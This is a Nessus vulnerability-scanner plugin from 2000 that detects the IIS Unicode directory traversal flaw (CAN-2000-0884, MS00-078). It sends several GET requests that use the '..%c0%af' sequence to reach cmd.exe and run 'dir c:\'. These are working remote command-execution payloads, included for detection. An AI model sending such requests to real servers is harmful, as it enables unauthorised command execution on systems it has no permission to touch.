#
# This script was written Renaud Deraison 
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10537);
 script_cve_id("CAN-2000-0884");

 name["english"] = "IIS directory traversal";
 script_name(english:name["english"]);
 
 desc["english"] = "
The remote IIS server allows anyone to execute arbitrary commands
by adding a unicode representation for the slash character 
in the requested path.

Solution:  See MS advisory MS 00-078
Risk factor: High";

 script_description(english:desc["english"]);
 
 summary["english"] = "Determines if arbitrary commands can be executed thanks to IIS";
 
 script_summary(english:summary["english"]);
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison");
 family["english"] = "CGI abuses";
 script_family(english:family["english"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 80);
 exit(0);
}
port = get_kb_item("Services/www");
if(!port)port = 80;


function check(req)
{
 soc = http_open_socket(port);
 if(soc)
 {
 send(socket:soc, data:req);
 r = recv(socket:soc, length:10240);
 
 close(soc);
 pat = "<DIR>";
 pat2 = "Directory";

 if((pat >< r) || (pat2 >< r)){
   	security_hole(port);
	return(1);
 	}
 }
 return(0);
}

req1 = http_get(
item:"/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\",
port:port);

req2 = http_get(
item:"/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\",
port:port);

req3 = http_get(
item:"/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\",
port:port);

req4 = http_get(
item:"/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\",
port:port);

req5 = cgibin() + "/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\";
	 
req5 = http_get(
item:req5,
port:port);


r = check(req:req1);
if(!r)r = check(req:req2);
if(!r)r = check(req:req3);
if(!r)r = check(req:req4);
if(!r)r = check(req:req5);


